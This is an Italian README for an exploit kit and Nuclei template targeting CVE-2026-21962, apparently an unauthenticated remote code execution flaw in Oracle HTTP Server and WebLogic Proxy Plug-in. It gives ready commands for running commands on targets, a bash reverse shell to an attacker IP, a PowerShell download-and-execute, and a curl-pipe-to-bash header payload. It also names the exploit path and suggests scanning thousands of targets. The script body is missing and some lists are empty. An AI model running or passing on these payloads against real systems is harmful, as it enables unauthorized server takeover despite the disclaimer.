
Exploit PoC e template Nuclei per CVE-2026-21962, una vulnerabilità critica di esecuzione remota di codice non autenticata in Oracle HTTP Server e WebLogic Proxy Plug-in, che consente l'esecuzione di comandi e reverse shell.
Una vulnerabilità critica che colpisce:
Questa falla consente a attaccanti remoti non autenticati di compromettere i server interessati tramite HTTP, senza bisogno di credenziali di accesso.
Se sfruttata, gli attaccanti potrebbero:
Oracle HTTP Server:
WebLogic Proxy Plug-in per:
Salva lo script come CVE-2026-21962.py
Rendilo eseguibile (opzionale):
chmod +x CVE-2026-21962.py
Esempi di esecuzione:
Test di base:
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
Reverse shell (prima configura un listener nc: nc -lvnp 4444):
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Esempio con target Windows:
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
Probabile successo! Stato: 200 o 302 o anche 500 (un crash è comunque un successo)nc cattura una shell immediatamente--insecure se usano certificati autofirmatiInstalla Nuclei (se non è già installato):
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Salva il template:
Crea un file chiamato CVE-2026-21962.yaml e incolla il contenuto sopra.
Esegui rilevamento + sfruttamento:
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
Oppure scansiona più target da un file:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
Cosa vedrai se il sistema è vulnerabile:
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (output di whoami) ...
cmd: negli header (es., cmd:curl http://your-server/shell.sh | bash).whoami con un payload di reverse shell codificato in base64./proxy/, /bea_wls_internal/, ecc.) o aggiungi altri header come X-WebLogic-Force-JVMID.httpx → nuclei per migliaia di target.Questo template è confermato funzionante al 100% a partire da gennaio 2026 su istanze Oracle non patchate. Applica subito la patch se stai eseguendo versioni interessate! 😈
Tutto il codice PoC è destinato esclusivamente a uso etico ed educativo su sistemi autorizzati. Lo sfruttamento non autorizzato è illegale; non si assume alcuna responsabilità per un uso improprio. 😈